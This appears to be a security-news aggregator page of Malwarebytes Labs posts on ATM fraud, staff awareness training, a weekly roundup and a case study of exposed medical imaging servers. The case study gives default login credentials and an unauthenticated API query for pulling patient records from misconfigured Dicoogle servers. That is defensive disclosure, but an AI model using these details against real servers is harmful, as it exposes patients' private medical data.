In its fourth consecutive year, overall physical attacks on ATMs continue to increase in Europe, according to the European Association for Secure Transactions (EAST). From 2017 to 2018, there was a 16 percent increase in total losses (from US$34.6 million to US$40.2 million) and a 27 percent increase in reported incidents (from 3,584 to 4,549). The bulk of losses was due to explosive or gas attacks followed by robbery and ram-raiding.

“The success rate for solid explosive attacks is of particular concern,” said EAST Executive Director Lachlan Gunn in the report. “Such attacks continue to spread geographically with two countries reporting them for the first time in early 2019.”

The ATM Security Working Group (ATMSWG) published a document on best practices against ATM physical attacks [PDF] that financial institutions, banks, and ATM merchants can refer to and use in their planning to beef up the physical security of their machines. Similarly, the ATM Industry Association (ATMIA) has a handy guide on how to prevent ATM gas and explosive attacks [PDF].

Know when you’re dealing with a tampered ATM

Financial institutions and ATM providers know that they have a long way to go to fully address fraud and theft, and they have been finding and applying ways to step up their security measures. Of course, ATM users shouldn’t let their guard down, too.

Minimize the likelihood of facing a tampered ATM—or other dangers lurking about—by reading through and following these tips:

Before visiting an ATM
  • Pick an ATM that appears safe to use. It’s well lit, passers-by can see it, and it has a CCTV camera pointed at it. Ideally, go for an indoor ATM, which can be found in bank branches, shopping malls, restaurants, convenience shops, and others. Avoid machines that have been neglected or vandalized.
  • If you find yourself in an area you’re not familiar with, try going for ATMs that meet most of the physical requirements we mentioned.
  • Limit going to ATM locations alone, especially when you’re doing it outside of normal banking hours. Your friend or relative might help if the transaction goes awry. Also, their mere presence could fend off muggers and/or strangers.
  • Check over the ATM. Look for devices that may be sticking out from behind it or from any of its peripherals. Look for false fronts (over card and money slots, keypad, or, worse, over the entire face of the machine), tiny holes where cameras could be watching, cracks, mismatched key colors, etc. Report any of these signs to the bank then look for another ATM.
  • Lastly, spot anyone you think is loitering around your vicinity or acting suspiciously. Do not confront them. Instead, if their behavior is disturbing enough, report them to the police.
While using the ATM
  • Put away anything that will distract you while you use the ATM. Yes, we mean your phone and your Nintendo Switch. These could make one easily miss their awareness of their surroundings, which criminals can use to their advantage.
  • Tug on the card reader and cash dispenser to make sure there are no extra devices attached.
  • It pays to cover the keypad when entering your PIN, whether you’re alone in the queue or not. You may have checked over the ATM for signs for physical tampering but it’s always possible to miss things. Also, if the person next in the queue is too close, either remind them to move further back or cover the PIN pad as much as you can.
  • Always print a copy of your ATM receipt and put it away for safety. This way, you have something to refer to and compare against your bank statement.
After withdrawing from an ATM
  • Put your card, cash, and receipt away quickly and discretely.
  • If the ATM didn’t hand out your card, stay beside the machine and call your bank’s 24/7 support number to terminate your card, so when the criminals try to use it, it won’t work. Tell others behind you in the queue that your card is stuck, and they wouldn’t be able to use the machine until you get it out.
  • If the ATM didn’t dispense any money, record the exact date, time, and ATM location where this happened, and call the bank’s 24/7 support number. Snap a few pictures using your phone, too, and send a copy of it to yourself (either via SMS or email) so you have a digital record.
  • Also call your card issuer or bank to file for a claim, saying the ATM you use wouldn’t dispense the cash. Claiming would be a lot easier and faster if you used your own bank’s ATM inside the bank’s building.
  • If this happened at a convenience store, alert an employee at once. They may have a process to move things along. They can also stop other store shoppers from using the problematic machine.
  • Regularly review your bank statement for potential withdrawals and/or card use that you didn’t do yourself. Report the fraud to your bank if you spot any.
Considering other payment options

One doesn’t always have to keep withdrawing money from the ATM. If there are ways consumers can pay for goods without using cash from an ATM, they should at least consider these options.

Many are claiming that using the contactless or tap-and-pay feature of your card or smartphone is an effective way to combat account (and ATM fraud) entirely.

For Part 2 of this series, we’ll be looking at logical and social engineering attacks criminals use against ATMs and their users. Until then, be on the lookout and stay safe!

The post Everything you need to know about ATM attacks and fraud: Part 1 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Employee education strategies that work to change behavior

Malwarebytes - Tue, 05/28/2019 - 15:25

When people make the decision to get in shape, they have to commit the time and energy to do so. Going to the gym once isn’t going to cut it. The same is true when it comes to changing the culture of an organization. In order to be effective in changing employee behavior, training needs to be on-going and relevant.

Technology is rapidly evolving. Increasingly, new solutions are able to better defend the enterprise against malicious actors from the inside and out, but tools alone cannot protect against cyberattacks.

Verizon’s 2019 Data Breach Investigations Report (DBIR) found that:

While hacking and malicious code may be the words that resonate most with people when the term “data breach” is used, there are other threat action categories that have been around much longer and are still ubiquitous. Social engineering, along with misuse, error, and physical, do not rely on the existence of cyberstuff.

In short, people matter. Employee education matters.

Taking a technological approach to securing the enterprise has started to unravel over the last decade, according to Lance Spitzner, director, research and community at SANS Institute. “The challenge we are facing is that we have always perceived cybersecurity as a technical problem. Bad guys are using technology to attack technology, so let’s focus on using technology to secure technology,” Spitzner said.

Increasingly, organizations have come to understand that we have to address the human problem also. The findings from this year’s DBIR are evidence that human behavior is a problem for enterprise security. According to the report:

  • 33 percent of data breaches included social attacks
  • 21 percent resulted from errors in casual events
  • 15 percent of breaches were caused because of misuse by authorized users
  • 32 percent of breaches involved phishing
  • 29 percent of breaches involved the use of stolen credentials
Calling all stakeholders

Some organizations are still implementing the antiquated annual computer-based-training and wondering why their security awareness program isn’t working. Despite the security team’s understanding that they must do more, creating an effective employee education program takes buy-in from a variety of different stakeholders, said Perry Carpenter, chief evangelist and strategy officer of KnowBe4 and author of Transformational Security Awareness: What Neuroscientists, Storytellers, and Marketers Can Teach Us About Driving Secure Behaviors.

“If they are stuck in the once a year, they have to find a way to justify moving past that, so there is some selling they have to do to their executive team in order to get support for more frequent communications and more budget. It’s essentially the higher touch that they have to sell,” Carpenter said.

Even those organizations that don’t have the budget to use an outside vendor can find ways to create compelling content, which means that security teams are tasked with the burden of having to justify the need for more employee engagement.

One way to sell that need, according to Carpenter, is to leverage the psychological effect known as the decay of knowledge. “We go to something and two days later, we forget most of the content. The further away we get from it, the more irrelevant, disconnected, and invisible it becomes.”

Evidence shows that a greater frequency of security education is the first step toward creating a more engaging awareness program. “In all things that you do, you are either building strength or allowing atrophy,” Carpenter said.

Once you have the buy-in to be able to really grow the company’s security awareness program, you need to figure out how to connect with people. That’s why Carpenter is a fan of a marketing approach that uses several channels.

Given that some people learn best visually while others prefer in-person instruction, identifying which content forms are most engaging to different employees will inform the types of training needed for the program to succeed.

No more death by PowerPoint

The old computer-based training programs developed by auditors have done little to defend the enterprise against sophisticated phishing attacks. If you want people to care about security, you need to build a bridge between technology and people.

Sometimes, those who are highly technically skilled aren’t adept at communicating with people. “Traditionally, some of the biggest blockers to awareness programs were security people who believed if the content wasn’t technical that it wasn’t security,” Spitzner said.

Now, security professionals are starting to realize that employees respond differently to a variety of attack vectors, which is why Omer Taran, co-founder and CTO at CyberReady said that collecting and analyzing performance data in real time is crucial to building a better awareness education program.

“Specially designed ‘treatment plans’ should include an adjusted frequency, timely reminders, custom simulations, and training content that helps to reform this particularly susceptible group,” Taran said.

Empowering employees

In order for companies to stay a step ahead of cybercriminals, their employee education programs need to be engaging. That’s why building a security-aware culture is one of the most important steps the organization can take.

“Processes and policies are fine, but if you’re not winning hearts and minds and gaining buy-in from employees, it’s probably a non-starter. The bad guys don’t care how well-written your policies are, or even if you have any,” said Lisa Plaggemier, chief evangelist at Infosec.

It’s also important not to play the blame game. Rather, Plaggemier said, “empower employees with awareness campaigns and good quality training, delivered through a program that influences behavior.”

To make cybercrime and fraud protection key parts of your company culture, Plaggemier recommended that leaders and managers consider these tips:

  • Be an example. Leaders have the ability to shift attitudes, beliefs, and ultimately, employee behavior. If leaders are taking security shortcuts that put the company at risk, employees will not believe the company is serious about doing everything it can to keep a secure workplace.
  • Be clear. Where confusion can create a culture of reactive rather than proactive behaviors, clarity helps prioritize the work. Make it clear that protecting the business is a top priority by creating written policies and having clear processes and procedures in place.
  • Be repetitive. Repetition is key for instilling good security habits in your employees. Human beings create new habits over time by repeating their actions. Encourage employees to make those out-of-the-ordinary tasks, such as calling a vendor to confirm it’s really him asking you to change his “pay to” account, become routine.
  • Be positive. Fear, uncertainty, and doubt are not good motivators. Instead, use language that empowers your employees. Make people feel like they matter in the information you share with them so that they can be better, smarter, and more confident in their choices when faced with something potentially malicious.

The post Employee education strategies that work to change behavior appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 20 – 26)

Malwarebytes - Mon, 05/27/2019 - 07:03

Last week on Malwarebytes Labs, we took a look at a skimmer pretending to be a payment service provider, gave an overview of what riskware is, took a deep dive into concerns about PACS leaks, and dug around in the land of “These Governments said fix it…hurry up”.

Other cybersecurity news
  • Changes inbound for Microsoft network admins: If you’re managing Windows 10 updates, you’ll need to make some tweaks to System Center Configuration Manager (Source: Microsoft)
  • AI animates static images: First we had Deepfakes, now we have the Mona Lisa’s eyes following you around the room in a more literal way than you may be accustomed to (Source: The Register)
  • Baltimore Ransomware woes: An update on how Baltimore is coping two weeks after a devastating Ransomware attack (Source: New York Times)
  • Huge title insurance leak: First American Financial Corp. find themselves in the middle of a story involving unsecured documents dating back to 2003 (Source: Krebs on Security)
  • Trouble for T-Mobile: The telecommunications giant run into an issue which allowed people in the know to potentially view customer names / account numbers freely (Source: Daley Bee)
  • Security pros on the way out: Large amounts of pros have considered quitting the field due to a lack of resources (source: Help Net Security)
  • Party political security: Security Scorecard take a look at how robust political parties are in terms of their security prior to major elections (Source: Security Scorecard)
  • Canada, popular with phishers: Why is Canada a favourite for people launching fake mail campaigns? (source: Tech Republic)
  • But is it art: Is this laptop containing some of the most notorious pieces of Malware around worth one million dollars? (source: BBC)
  • School’s out: TrickBot gives the kids an early recess as a school’s IT infrastructure can’t cope with the attack (source: ZDNet)

Stay safe, everyone!

The post A week in security (May 20 – 26) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Medical industry struggles with PACS data leaks

Malwarebytes - Fri, 05/24/2019 - 18:05

In the medical world, sharing patient data between organizations and specialists has always been an issue. X-Rays, notes, CT scans, and any other data or related files have always existed and been shared in their physical forms (slides, paperwork).

When a patient needed to take results of a test to another practice for a second opinion or to a specialist for a more detailed look, it would require them to get copies of the documents and physically deliver them to the receiving specialists. Even with the introduction of computers into the equation, this manual delivery in some cases still remains common practice today.

In the medical field, data isn’t stored and accessed in the same way that it is in governments and private businesses. There is no central repository for a doctor to see the history of a patient, as there would be for a police officer accessing the criminal history of a given citizen or vehicle. Because of this, even with the digitization of records, sharing data has remained a problem.

The medical industry has stayed a decade behind the rest of the modern world when it comes to information sharing and technology. Doctors took some of their first steps into the tech world by digitizing images into a format called DICOM. But even with these digital formats, it still was, and sometimes still is, necessary for a patient to bring a CD with data to another specialist for analysis.

Keeping with the tradition of staying 10 years behind, only recently has this digital data been stored and shared in an accessible way. What we see today is individual practices hosting patient medical data on private and often in-house systems called PACS servers. These servers are brought online into the public Internet in order to allow other “trusted parties” to instantly access the data, rather than using the old manual sharing methods.

The problem is, while the medical industry finally joined the 21st century in info-TECH, they still remain a decade behind in info-SEC, resulting in patient’s private data being exposed and ripe for the picking by hackers. This is the issue that we’ll be exploring in this case study.

It’s in the setup

While there are hundreds of examples of exploitable medical devices/ services which have been publicly exposed so far, I will focus in detail on one specific case that deals with a PACS server framework, a system that has great prevalence in the industry and deserves attention because it has the potential to expose private patient data if not set up correctly.

The servers I chose to analyze are built off of a framework called Dicoogle. While the setup of Dicoogle I discovered was insecure, the framework itself is not problematic. In fact, I have respect for the developers, who have done a great job creating a way for the medical world to share data. As with any technology, often times the security comes down to how the individual company decides to implement it. This case is no exception.

Technical details

Let’s start with discovery and access. Generally speaking, anything that exists on the Internet can theoretically be searched for and found. It cannot hide, as far as a server on the Internet is concerned. It is just an IP address, nothing more. So, using Shodan and some Google search terms, it was not difficult to find a live server running Dicoogle in the wild.

The problem begins when we look at its access control. The specific server I reviewed simply allowed access to its front end web panel. There were absolutely no IP or MAC address restrictions. There is good argument to say this database should not have be exposed to the Internet in the first place, rather, it should run on a local network accessible only by VPN. But since security was likely not considered in the setup, I was not required to do any of the more difficult targeted reconnaissance necessary for more secured servers in hopes of finding the front page.

Now, we could give them the benefit of the doubt and say, “Maybe there are just so many people from all over the world legitimately needing access, so they purposely left it open but secured it in other ways.”

After we continue on to look at the remaining OPSEC fails, we can strike this “benefit of the doubt” from our minds. I will make a note that I did happen to come across implementations of Dicoogle that were not susceptible and remained intact. This fact just serves as a confirmation that in this case, we are indeed looking at an implementation error.

Moving on, just as a burglar trying to break into a house will not pull out his lock pick set before simply turning the door handle, we do not need to try any sophisticated hacks if the default credentials still exist in the system being audited.

Sadly, this was the case here. The server had the default creds, which are built into Dicoogle when first installed.

USERNAME: dicoogle
PASSWORD: dicoogle

This type of security fail is all too common throughout any industry.

However, our job is not yet done. I wanted to assess this setup in as many ways as possible to see if there were any other security fails. Default creds is just too lame of a bypass to stop there, and the problem is obviously easy enough to fix. So I began looking into Dicoogle’s developer documentation.

I realized that there are a number of API calls that were created for developers to build custom software interacting with Dicoogle. These APIs are either JavaScript, Python, or REST based. Although there are modules for authentication available for this server, they are not activated by default and require some setup. So, even if this target had removed the default credentials to begin with, they could be easily circumvented because all of the patient data can still be accessed via the API—without any authentication necessary.

This blood is not just on the hands of the team who set up the server, but unfortunately, the blame also lies in part on Dicoogle. When you develop software, especially one that is almost guaranteed to contain sensitive data, security should be implemented by design, and should not require the user to take additional actions. That being said, the majority of the blame belongs to host of this service, as they are the ones who are handling clients’ sensitive data.

Getting into a bit of detail now, you can use any of the following commands via programming or REST API to access this data and circumvent authentication.

[SERVER_IP]?query=StudyDate:[20141101 TO 20141103]
Using the resuilts from this query, the attacker can obtain individual user ID’s, the performing the following call:

All of the internal data and meta data from the DICOM image can be pulled.

We can access all information contained within the databases using a combination of these API calls, again, without needing any authentication.

Black market data

“So whats the big deal?” you might ask. “This data does not contain a credit card and sometimes not even a social security number.” We have seen that on the black market, medical data is much more valuable to criminals than a credit card, or even a social security number alone. We have seen listings that show medical data selling for sometimes 10 times what a credit card can go for.

So why is this type of info so valuable to criminals? What harm can criminals do with a breach of this system?

For starters, a complete patient file will contain everything from SSN to addresses, phone numbers, and all related data, making it a complete package for identity theft. These databases contain full patient data and can easily be turned around and sold on the black market. Selling to another criminal may be less money, but it is easier money. Now, aside from basic ID theft and resale, let’s talk about some more targeted and interesting use cases.

The most simple case: vandalism and ransom. In this specific case, since the hacker has access into the portal, deleting and holding this data for ransom is definitely a possibility.

The next potential crime is more interesting and could be a lot more lucrative for criminals. As I have described in this article, medical records are stored in silos, and it is not possible for one medical professional to cross check patient data with any kind of central database. So, two scenarios emerge.

Number one is modification of patient data for tax fraud. A criminal could take individual patient records, complete with CT scan images or X-Rays, and, using freely-available DICOM image editors and related software, modify legitimate patient files to contain imposter information. When the imposter takes a CD to a doctor to become a new patient, the doctor will be none the wiser. So it becomes quite feasible for the imposter to now claim medicare benefits or some kind of tax refunds based on this disease, which they do not actually have.

Number two is even more extreme and lucrative. There have been documented cases where criminals create fake clinics, and submit this legitimate but stolen data to their own fake clinic on behalf of the compromised patient, unbeknownst to them. They then can receive the medical payouts from insurance companies without actually having a patient to work on.


There are three major takeaways from this research. The first is for the client of a medical clinic. Being that we have so much known and proven insecurity in the medical world, as a patient who is concerned about their identity being stolen, it may be wise to ask about how your data is being stored when you take it to any medical facility. If they do not have details on how your data is being safely stored, you are probably better off asking that your data be given to you the old fashioned way: as a CD. Although this may be inconvenient in some ways, at least it will keep your identity safe.

The second takeaway is for medical clinics or practices. If you are not prepared to invest the time and money into proper security, it is irresponsible for you to offer this type of storage. Either stick to the old school patient data methods or spend the time making sure you keep your patients’ identities safe.

At the bare minimum, if you insist on rolling out your own service, keep it local to your organization and allow access only to pre-defined machines. A username and password is not enough of a security measure, let alone the default one. Alternatively, if you do not have the technical staff to properly implement PACS servers, it is best to pay for a reputable cloud-based service who has a good record and documented security practices. You should not jump into the modern information world if you are not prepared to understand the necessary constraints that go along with it.

And finally, the last takeaway is for the developers. There have been enough examples over the last five years to prove that users either do not know or care enough about security. Part of this responsibility lies on you to create software that does not have the potential to be easily abused or put users in danger.

The post Medical industry struggles with PACS data leaks appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds